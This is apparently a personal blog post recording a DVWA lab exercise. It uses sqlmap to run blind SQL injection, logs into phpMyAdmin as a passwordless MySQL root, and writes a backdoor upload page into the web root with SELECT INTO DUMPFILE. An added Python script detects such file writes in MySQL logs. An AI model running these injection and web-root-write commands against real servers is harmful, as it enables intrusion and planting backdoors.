Sunday, July 24, 2011

SQL DUMPFILE

Vulnerable web page: http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=%27&Submit=Submit#
I ran sqlmap against it with:
root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.102/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie='PHPSESSID=ahh7j1bsrtrs5qtjn8tgpcp4g2; security=low' --dbs

and got:
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL >= 5.0.0
[11:55:00] [INFO] fetching database names
available databases [14]:
[*] abal2
[*] auracms
[*] auracms1
[*] cdcol
[*] dvwa
[*] information_schema
[*] joomla
[*] joomla1
[*] mysql
[*] phpmyadmin
[*] test
[*] upload
[*] wordpress
[*] wordpress2

After running:

root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie="PHPSESSID=lp7qif2ecvd2lod7rp3unddfs1; security=low" --password

I got:

web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5
[11:56:26] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[11:56:29] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[11:56:29] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL


Now I have two users, pma and root, both with no password.


After getting the MySQL user and password, I log in to phpMyAdmin at:
192.168.56.102/phpmyadmin
Then I create a database named bd
and create the table for the upload.

Second, I create the table for the form.
After creating the database and tables, the result looks like this:
Then I insert SQL like this:
To dump the files, run:
1. select * into dumpfile '/opt/lampp/htdocs/kotak.html' from kotak;
2. select * into dumpfile '/opt/lampp/htdocs/unggah_file.php' from unggah_file;
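From the defender's side, the two statements above are exactly what a MySQL general query log records when the DBMS is used to write files into the web root; the following is an added example (not from the original post) that scans constructed general-log lines for INTO DUMPFILE / INTO OUTFILE and rates each write by where the file lands. The log lines, the web-root list and the extension list are assumptions for the demo; on a real server also check that secure_file_priv is set to a directory outside the web root.

```python
import re

# Constructed sample lines in MySQL 5.x general query log format (not from the page).
SAMPLE_LOG = """\
110724 11:58:02\t   3 Connect\troot@localhost on bd
110724 11:58:05\t   3 Query\tselect * from kotak
110724 11:58:09\t   3 Query\tselect * into dumpfile '/opt/lampp/htdocs/kotak.html' from kotak
110724 11:58:15\t   3 Query\tSELECT * INTO OUTFILE '/tmp/export.csv' FROM unggah_file
110724 11:58:20\t   3 Query\tselect * into dumpfile '/opt/lampp/htdocs/unggah_file.php' from unggah_file
110724 11:58:30\t   4 Connect\tpma@localhost on phpmyadmin
"""

# Directories served by the web server (assumed); a DBMS write here is a code-execution risk.
WEB_ROOTS = ("/opt/lampp/htdocs", "/var/www")
# Extensions the server would execute rather than serve as static content (assumed).
EXEC_EXT = (".php", ".phtml", ".php5", ".cgi")

FILE_WRITE_RE = re.compile(
    r"\bINTO\s+(DUMPFILE|OUTFILE)\s+'([^']*)'", re.IGNORECASE)
LOG_LINE_RE = re.compile(r"^(\S+\s+\S+)\t\s*(\d+)\s+Query\t(.*)$")

def classify(path):
    """Severity of a DBMS file write based on where the file lands."""
    in_webroot = any(path.startswith(root + "/") for root in WEB_ROOTS)
    if in_webroot and path.lower().endswith(EXEC_EXT):
        return "critical"   # server-side code dropped into the web root
    if in_webroot:
        return "high"       # arbitrary content exposed over HTTP
    return "medium"         # write outside the web root, still worth review

def scan_general_log(text):
    """Return (timestamp, thread_id, severity, path) for each file-writing query."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue            # connect/quit lines and other non-query records
        ts, thread, query = m.groups()
        w = FILE_WRITE_RE.search(query)
        if w:
            path = w.group(2)
            findings.append((ts, thread, classify(path), path))
    return findings

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print("%s thread=%s %-8s %s" % f)
```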

That completes the backdoor upload.
192.168.56.102/kotak.html

But there is a script error.

-=CMIIW=-

1 comment:

  1. Correct your script for processing the upload... see on Google how to create an upload file with PHP...
